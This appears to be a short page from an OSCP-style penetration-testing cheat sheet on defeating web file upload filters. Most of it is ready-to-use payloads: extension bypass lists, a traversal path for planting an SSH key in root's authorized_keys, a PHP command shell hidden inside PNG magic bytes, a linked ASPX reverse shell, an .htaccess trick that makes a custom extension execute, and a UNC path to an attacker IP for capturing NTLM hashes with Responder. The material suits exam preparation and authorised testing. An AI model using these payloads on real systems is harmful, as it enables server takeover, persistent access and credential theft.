> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/file-upload.md).

# File Upload

```
.pHP        .php%00        .asp        .pl
.phps       .php%20        .aspx       .cgi
.php2-7     .php%0a        .ashx
.phar       .php%00.png    .jsp
.phtml      .php#png       .jspx
.pht        .png.php       .jsw
```

> If the web application indicates that the file already exists, we can use this method to brute force the contents of a web server

#### Combined with directory traversal&#x20;

```
../../../../../../../test.txt
../../../../../../../root/.ssh/authorized_keys    <-- include public key
```

### Magic Bytes

Only include the first and last bytes of an approved file type and inject php code in the middle

<pre><code>�PNG
����lk�7�,ZtSoftwareAdobe ImageReadyq�e&#x3C;3�IDATx���
 &#x3C;?php system($_GET['cmd']); ����lk�7�,
<strong>����lk�7�,
</strong></code></pre>

{% embed url="<https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx>" %}

### .htaccess

Upload a new .htaccess file and allow a new file extension to be executed

```
AddType application/x-httpd-php .pwned
```

Now upload a reverse shell with the .pwned extension

### &#x20;Responder + File upload

Spin up responder and change file name to share and watch the hashes fly

```
"\\\\192.168.45.237\\adot8"
```

<figure><img src="/files/CkjlTQrycMCfLaxEm0Px" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VVLyEGwdbiKhdDeVxNZx" alt=""><figcaption></figcaption></figure>
